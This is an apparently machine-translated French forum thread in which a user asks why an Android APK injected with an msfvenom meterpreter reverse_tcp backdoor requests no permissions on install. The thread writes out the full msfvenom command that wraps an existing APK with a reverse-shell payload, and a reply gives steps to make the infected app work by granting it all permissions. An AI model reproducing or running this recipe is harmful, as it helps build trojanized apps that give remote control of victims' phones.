J'essaye d'injecter un apk avec la charge utile de msfvenom, et ainsi obtenir une porte dérobée sur mon appareil Android lors de son installation. Pourquoi ne demande-t-il pas les autorisations lors de l'installation?
Dans le passé, j'ai réussi à créer une charge utile autonome et à obtenir un tunnel de porte dérobée vers mon appareil.
msfvenom -p android / meterpreter / reverse_tcp -x /Users/root/Downloads/newApp.apk LHOST = [IP] LPORT = [port] -o /Users/root/Desktop/android.apk
Je m'attendais à ce que l'application demande toutes les autorisations spécifiées dans le fichier manifeste, mais elle n'en demande aucune pendant l'installation ou lors de l'exécution.
3 Réponses :
Vous devez spécifier les autorisations dont dispose Main.apk sur votre appareil ... les avez-vous vérifiées? S'il n'a pas demandé l'autorisation, il est probable qu'il n'en ait pas.
J'ai eu le même problème, mais j'ai trouvé une solution.
Je l'ai déjà vérifié et ça marche
a essayé la même chose en utilisant APK Editor pro mais il montre la version minimum du SDK 19 et la version 30 du SDK cible ne demandant toujours pas l'autorisation
J'ai trouvé des problèmes dans la génération de la charge utile, mais j'ai également trouvé une solution.
1.- Injectez la charge utile dans l'application d'origine.
2.- Installez le fichier apk sur un appareil Android.
3.- Accédez aux paramètres de l'application et recherchez l'application infectée.
4.- Accordez toutes les autorisations.
Et c'est tout, cela a fonctionné pour moi.